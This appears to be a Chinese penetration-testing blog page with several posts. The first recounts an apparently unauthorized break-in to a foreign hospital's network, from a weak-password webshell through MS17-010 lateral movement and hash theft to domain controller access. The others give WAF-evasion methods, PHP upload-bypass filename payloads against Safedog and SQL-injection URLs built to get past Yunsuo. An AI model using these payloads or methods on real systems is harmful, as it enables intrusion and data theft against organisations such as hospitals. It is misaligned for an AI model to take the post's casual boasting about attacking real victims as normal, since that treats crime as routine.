分类 渗透 下的文章

暑假第二站--初次域渗透

以前自己也搭建过域,简单的了解了下域的概念。这次实战遇到,然后一脸懵逼,只好再次搭建,学习了一些姿势,拿下域控。
过程大概是这样的:目标是个国外医院,这些站的shell都很好拿,我一般会google搜一番“vpn,内部,员工专区,inner,upload,admin,manager,auth,email”这些关键字,往往很快就能找到突破口。这次便是一个子目录下的文件管理存在弱口令,进去直接getshell。进去之后第一件事就是提权,看下补丁还是蛮多的,而且有个趋势科技的杀软,试了几个exp,没打下。看了下端口开着3306,于是到目录里翻到了root密码,udf提了权。
进到内网之后,简单探测了下,发下存在多个域,但是目前这台机器在工作组里,拿ms17010打下了c段的其他几台主机,找到几台在某个域里的主机。这时候收集了下域用户,域管理,域内主机,域控主机的相关信息,然后惊奇的发现一个在线的域管理,抓下hash,直接登陆域控。
虽然过程很简单,但是太费时间了,中间很多东西都是现学,剩下的几个域也没搞了,以后再说吧。
最后,cs和msf配合起来真的是美滋滋呀,他们之间还能互传会话,简直不能再爽。

过waf总结

怼了几天waf,简单总结下。

  • 第一类waf,像安全狗,云锁此类,直接安装在目标服务器上。首先,需要注意的是,这类东西一旦触发警报,就会立刻短信通知站长,所以盲测动静是很大的。从防护方式上来说,以安全狗为例,就是简单粗暴的去匹配HTTP报文里的危险字符串,所以我们以只需要简单粗暴的绕过他的正则就行了。这就需要结合具体的语言特性和各种tricks了。
    另一种绕过思路,就是构造畸形的HTTP报文,由于waf和中间件对HTTP报文的认知不统一,造成绕过。往往waf对HTTP报文的格式要求比较严格,而中间件对报文格式要求比较松散。

最后就是攻击waf本身,例如请求一些畸形数据或者发送大量垃圾数据来使waf挂掉或者失效。

  • 云waf,这类waf的原理是先把流量引入waf服务器,经过过滤再发往目标服务器。当然上面的绕过思路可以借用到这里。另外,最简单的办法就是让流量不经过waf服务器。找真实IP是比较简单的办法。

云锁,安全狗此类都采用了cs架构,所以,上述两类waf其实还有个共同点,就是他们都能在远端进行管理,如果能社到客户端的登陆账号......

过安全狗上传

环境

win03 + apache + php + 网站安全狗(APACE版)V4.0 防护规则全开
测试代码:

<html>
<body>
<form action="" method="post" enctype="multipart/form-data" name="file">
    <input type="file" name="file">
    <input type="submit" value="upload">
</form>
</body>
</html>
<?php
error_reporting(0);
if(isset($_FILES['file'])) {
    if(is_file($_FILES['file']['tmp_name'])) {
        $ext = array_pop(explode('.', $_FILES['file']['name']));
    var_dump(explode('.', $_FILES['file']['name']));
        $filename = './images/' . @date("YmdHis").rand(100, 999).'.'.$ext;
        $res = move_uploaded_file($_FILES['file']['tmp_name'], $filename);
        if($res) {
            echo $filename;
        }else {
            echo 'error 1';
        }
    }else {
        echo 'error 2';
    }
}else {
    echo 'error 3';
}

安全狗默认拦截后缀为php的文件上传,而windows下传php3,phtml是不解析的,本文主要介绍如何绕过黑名单上传php。

第一种

filename="php" 

无后缀,比较鸡肋,只适合上述代码这种特殊情况

第二种

filename="1 .gif.php"
或者
filename="1. .php"

第三种

filename=="1.php"

多个等于符号

第四种

filename= "1.php"

等于后面加空格,TAB,回车

第五种

1.png

后缀后面加入空字符

第六种

2.png
3.png
4.png

在不破坏报文结构的情况下在Content-Disposition插入大量垃圾数据。

过云锁注入

环境

win03 + apache + php + 云锁 win_3.1.6

绕过

法1

云锁特性:先检测post,安全的话就会跳过get

法2

联合:

http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,2,3-- -

用户名/数据库:

http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select 1,user (),3-- -

表名:

http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select\N,table_name,\Nfrom information_schema.tables where table_schema='blog' limit 1 offset 1-- -

列名:

http://192.168.6.145/test.php?id=2%27/*!40000/*!30000union*/DISTINCTROW select\N,column_name,\Nfrom information_schema.columns where table_name='users' limit 1 offset 1-- -